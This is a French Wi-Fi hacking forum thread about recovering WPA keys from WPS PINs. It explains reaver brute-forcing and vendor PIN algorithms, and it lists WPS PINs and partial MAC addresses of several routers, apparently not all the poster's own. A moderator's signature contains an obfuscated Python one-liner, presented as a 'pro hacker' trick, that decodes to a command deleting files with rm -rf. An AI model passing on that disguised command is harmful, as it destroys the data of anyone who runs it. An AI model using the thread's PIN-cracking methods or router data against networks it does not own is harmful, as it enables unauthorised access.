Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-01-2014 19:21:37

malakif
Nouveau membre

Clé WPA à partir d'une clé WPS possible ?

Bonjour à tous,

Désolé si la question à deja été posé, j'ai pourtant chercher sur le forum mais je n'est pas trouvé de réponse, surment dû à une recherche sans utilisation des bon termes.

Peut-on trouvé une clé WPA à partir d'une clé WPS ?

j'ai remplacé un collègue à Djibouti, celui si m'a laisser un modem huawei hg532e, il m'a fourni la clé wps, j'ai reussi à connecter mon pc sous windows (pas de souci de ce coté la), le souci c'est que quand j'éssai de connecter mon téléphone sous android, la c'est impossible, je voudrai essayer la clé wpa.

Sachant que je ne peut pas acceder a la page d'administration du modem (j'ai essayer tous login et mdp par default pour huawei il à surment du le modifier)

Je remercie d'avance celui ou ceux qui pourrons m'aider

Celui qui connait doit montrer à celui qui ne connait pas afin que celui qui ne connaissait pas puisse montré à celui qui ne connait pas.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-01-2014 19:42:57

FFOO31
Membre d'Or

Re : Clé WPA à partir d'une clé WPS possible ?

pas de clé s'appelle WPS

#3 12-01-2014 20:02:07

malakif
Nouveau membre

je reformule

Peut-on récupérer une clé WPA à partir d'un code pin WPS ?

Celui qui connait doit montrer à celui qui ne connait pas afin que celui qui ne connaissait pas puisse montré à celui qui ne connait pas.

#4 12-01-2014 20:18:15

petros
Membre Hyperactif

click droit sur le réseau connecté -> Propriétés -> Clé de sécurité..... (Win 7).....
soit wirelesskeyview:
http://www.nirsoft.net/utils/wireless_key.html

#5 12-01-2014 20:45:30

FFOO31
Membre d'Or

si tu es proprietaire du modem et t'as oublie la clef donc connecte toi a ce dernier avec 192.168.1.1 et si tu n'est pas le cas et tu veux cracker wpa avec code pin wps donc lance le reaver

#6 12-01-2014 20:57:32

Furyo
Membre Irremplaçable
Site Web

Bonjour et Bienvenue wink

Tres simple et rapide à resoudre...

Tu prends ton telephone et tu composes le numero de ton ami...

Une fois lui avoir souhaité tes voeux pour la nouvelle année, tu lui demandes gentillement la cle ou les pass pour l'acces au routeur ...

wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#7 12-01-2014 21:59:12

kcdtv
Membre d'honneur
Lieu : Internacionaluña

un modem huawei hg532e

bonsoir et bienvenue.

Pourrais tu nous donner plus de détails sur ce routeur?
Je pense que le PIN WPS se calcule en fonction de la mac et peut être aussi du fin essid, comme c'est le cas avec les HG532c, HG532s et les HG556a
si tu veux bien vérifier cela ça m'intéresse beaucoup par rapport à WPSPIN

Peut-on trouvé une clé WPA à partir d'une clé WPS ?

Tu n'as en effet as beaucoup cherché sur le forum tongue

Bruteforce WPS (Wifi Protected Setup):  … & Wpscrack

Ce que fait reaver c'est "trouver" le PIN WPS en essayant les PIN les uns après les autres jusqu'à ce qu'il tombe sur le bon.
Grâce au PIN il va "trouver" la clef WPA parce que le point d'accès la lui donne.

Le WPS a été conçu pour simplifier la connexion des clients qui n'ont plus à entrer à la main des clefs WPA robustes donc longues et non prononçables mais un simple code de 8 chiffres ( 7 pour être précis parce que pas mal d'utilité intègrent la règle du checksum WPS, le dernier digit étant une somme de validation des sept digits antérieurs)

Grâce à se code il seront connecté mais la clef employée pour régenter le traffic wireless reste la clef robuste et longue WPA.
Pour pouvoir se communiquer avec le router, le client à besoin de la clef telle quelle à la virgule près
Le router l'envoie donc au dispositif qui a émit le PIN WPS valable,
C'est toujours la clef WPA qui fait office de clef WPA ( encoder le traffic )
Bref, il est important de bien faire la différence entre PIN WPS et clef WPA, se sont deux choses différentes qui n'ont pas de relation directe.
Maintenant il peut y avoir relation, ce sera la faute du fabricant et de la faiblesse des algorithmes employés pour créer passphrase  et PIN.
Nous avions parlé il n'y a pas si longtemps que cela du cas des easy box ou PIN et clef WPA se génèrent presque de la même façon en utilisant deux clefs transitionnelles.
Algorithme Easy box Vodafone (Allemagne)
PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Je pense que cette clef WPA est quelque part gardée dans ton ordinateur, vu qu'il y a surement un profil de crée wink
Tu peux donc Utiliser des tools type wireless key view ( windows je ne connais pas trop mais le bon vieux wireless key view devrait faire l'affaire)

#8 13-01-2014 06:58:56

malakif
Nouveau membre

Merci petros, j'ai trouvé la clé wpa avec WirelessKeyView v1.68.

kcdtv, merci pour ton explication. Voici ce que tu demande pour ta collection :

- ESSID : HG532e-RZWCC7
          - BSSID : ec:23:3d:ec:xx:xx (si t'a besoin des 4 derniers demande en MP)
          - WPS PIN : 54992405

Merci à vous

#9 13-01-2014 08:09:59

malakif
Nouveau membre

kcdtv, à Djibouti il n'y a pratiquement que des hg532e, voici un autre

ESSID : HG532e-KS6C3F
BSSID : ec:23:3d:ec:xx:xx  (si t'a besoin des 4 derniers demande en MP)
WPS PIN : 54715004

#10 13-01-2014 12:24:04

FFOO31
Membre d'Or

malakif, essye le scypt WPSPIN si ça marche avec to router

#11 13-01-2014 13:52:57

malakif
Nouveau membre

FF0031, pour info je viens de tester sur 2 routeurs hg532e avec l'application android WPSPIN

(https://play.google.com/store/apps/deta … SPIN&hl=fr)

Ca fonctionne à merveille

Le script don tu me parle c'est le même ?

kcdtv, tiens 1 de plus à ta collection :

ESSID : HG532e-SLG65R
BSSID : ec:23:3d:ec:xx:xx
WPS PIN : 54783249

Dernière modification par malakif (13-01-2014 14:08:45)

#12 13-01-2014 14:04:37

spawn
Modérateur

L'outil reaver permet de retrouver la PSK (clef WPA) à partir d'un pin WPS.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#13 13-01-2014 14:55:18

malakif
Nouveau membre

FFOO31, je vient de tester le script WPSPIN 1.4 sous bt5 sur un hg532e

Resultat : Erreur de syntaxe : MAC Non Conforme

Pourtant l'application pour Android fonctionne très bien.

#14 13-01-2014 17:49:08

FFOO31
Membre d'Or

tu travail avec le scrypt WPSPIN de notre ami kcdtv?

#15 13-01-2014 17:50:34

kcdtv
Membre d'honneur

L'application pour android n'a en fait rien à voir avec le script WPSPIN si ce n'est le nom qui a été malicieusement copié et le fait qu'il se sert de la base de donnée que je maintiens et des algorithmes mis en évidence par le script WPSPIN publié ici et dans lampiweb antérieurement à l'application android.
mais comme c'est le même algo ça veut dire que ça marche...

Resultat : Erreur de syntaxe : MAC Non Conforme

étrange.
Il te faut mettre la mac comme elle apparait dans airodump-ng, avec les lettres en majuscules et les deux points.
exemple

EC:23:3D:EC:11:AA

l'idée c'est en fait que tu puisse copier et coller ton bssid depuis un scan airodump-ng ou avec iw, wpa_cli
Tu as aussi le mode automatisé avec wash et reaver et qui te montre le PIN possible pour chaque objectif au moment du scan.

Dans tous les cas merci pour cette information, si tu pouvais m'envoyer un MP avec l'info complète pour être bien sûr, avec si possible la version du firmware, le numéro de série et la clef WPA par défaut ( pour études )
Bien évidemment quand au numéro de série, la clef WPA et la fin BSSID; ces données sont personnelles, je les gardes pour moi et jamais ne les publierai ou les passerai à qui que ce soit.

#16 14-01-2014 12:18:39

malakif
Nouveau membre

kcdtv, autant pour moi, effectivement en utilisant WPSPIN ou reaver/wash il me propose les bons Pin WPS.

Je te MP le firm, le numéro de série, la clé wpa et la fin du BSSID.

#17 14-01-2014 18:42:00

kcdtv
Membre d'honneur

J'ai bien reçu ton MP.
Merci beaucoup.
Nous pouvons ajouter le HG532e au HG530s, HG556a et HG532c dans la liste des routers huawei connus affectés...  cool

#18 14-01-2014 21:06:22

FFOO31
Membre d'Or

je pense aussi que TPLINK est vulnérable à WPSPIN

#19 15-01-2014 12:12:30

malakif
Nouveau membre

kcdtv , ce fut un plaisir, au contraire merci à vous.

FF0031, j'ai un TP-Link_xxxxxx avec MAC : 64:70:02:xx:xx, j'étai tombé sur un  script qui génère des clé WPA, du genre tplinkDictionary, je n'arrive pas a mettre la main dessus, quelqun aurai un lien svp ?

je croi que j'aurai du creer un nouveau sujet

#20 15-01-2014 12:53:29

FFOO31
Membre d'Or

tu veux recuperer la WPA d'un Tplink à l'aide du WPSPIN en 3s, moi j'ai dejà tester 2 réseaux TPLINK et ça marchait, mais le seul probleme la faille wps doit etre activée, et généralement sont activées par default.
pour le dictio tplink j'ai pas idée.

#21 19-01-2014 12:16:20

malakif
Nouveau membre

je stop ce sujet, j'en ferai un autre pour tp-link_xxxxxx.

Annonce